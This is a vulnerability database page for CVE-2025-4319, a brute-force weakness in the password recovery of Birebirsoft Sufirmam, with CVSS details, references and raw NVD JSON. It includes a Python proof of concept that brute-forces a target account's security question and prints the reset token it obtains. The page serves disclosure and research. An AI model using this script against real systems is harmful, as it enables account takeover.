CVE-2025-4319

Description

Improper Restriction of Excessive Authentication Attempts, Weak Password Recovery Mechanism for Forgotten Password vulnerability in Birebirsoft Software and Technology Solutions Sufirmam allows Brute Force, Password Recovery Exploitation.This issue affects Sufirmam: through 23012026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

9.4

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H

Configurations (Affected Products)

No configuration data available.

Birebirsoft Sufirmam <= 23012026 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-4319 PoC - Sufirmam Weak Password Recovery Mechanism # This PoC demonstrates the brute-force attack on password recovery import requests import time import sys from concurrent.futures import ThreadPoolExecutor, as_completed TARGET_URL = "https://target-system.com" # Replace with actual target USERNAME = "[email protected]" # Target username/email # Common security question answers for brute-forcing COMMON_ANSWERS = [ "fluffy", "max", "buddy", "cat", "dog", "john", "jane", "123456", "password", "admin", "test", "qwerty", "mother", "father", "sister", "brother", "pet", "birthday", "january", "february", "march", "april" ] def test_password_recovery(): """ Test password recovery mechanism without rate limiting """ session = requests.Session() # Step 1: Request password reset reset_url = f"{TARGET_URL}/api/password-reset/request" payload = {"username": USERNAME} try: response = session.post(reset_url, json=payload, timeout=10) if response.status_code == 200: print(f"[+] Password reset requested for {USERNAME}") return session, response.json() except Exception as e: print(f"[-] Error: {e}") return None, None def brute_force_security_question(session, question_id, answers): """ Brute-force security question answers """ verify_url = f"{TARGET_URL}/api/password-reset/verify" for i, answer in enumerate(answers): payload = { "question_id": question_id, "answer": answer.strip().lower() } try: response = session.post(verify_url, json=payload, timeout=5) # Check for successful verification if response.status_code == 200 and "success" in response.text.lower(): print(f"[+] VULNERABLE! Answer found: {answer}") print(f"[+] Session token: {response.json().get('reset_token')}") return True # No rate limiting detected if i % 10 == 0: print(f"[*] Testing answer {i+1}/{len(answers)}: {answer}") except Exception as e: print(f"[-] Request error: {e}") continue return False def main(): print("=" * 60) print("CVE-2025-4319 PoC - Sufirmam Password Recovery Brute Force") print("=" * 60) # Check if system is vulnerable to brute force session, reset_data = test_password_recovery() if session and reset_data: question_id = reset_data.get("question_id") if question_id: print(f"[*] Starting brute-force attack on security question...") print(f"[*] No rate limiting detected - VULNERABLE") success = brute_force_security_question( session, question_id, COMMON_ANSWERS ) if success: print("\n[!] Target is VULNERABLE to CVE-2025-4319") print("[!] Immediate remediation required") else: print("\n[*] Attack completed - answer not found in wordlist") if __name__ == "__main__": main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-4319
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-4319
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-4319/
[4] VulDB https://vuldb.com/cve/CVE-2025-4319
[5] https://www.usom.gov.tr/bildirim/tr-26-0005

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-4319", "sourceIdentifier": "[email protected]", "published": "2026-01-23T13:15:48.967", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Restriction of Excessive Authentication Attempts, Weak Password Recovery Mechanism for Forgotten Password vulnerability in Birebirsoft Software and Technology Solutions Sufirmam allows Brute Force, Password Recovery Exploitation.This issue affects Sufirmam: through 23012026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Restricción inadecuada de intentos de autenticación excesivos. Vulnerabilidad de mecanismo débil de recuperación de contraseña para contraseña olvidada en Birebirsoft Software y Technology Solutions Sufirmam permite Fuerza Bruta y Explotar la recuperación de contraseña. Este problema afecta a Sufirmam: hasta el 23012026. NOTA: Antes de divulgar esta vulnerabilidad se contactó con el proveedor, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}, {"lang": "en", "value": "CWE-640"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-26-0005", "source": "[email protected]"}]}}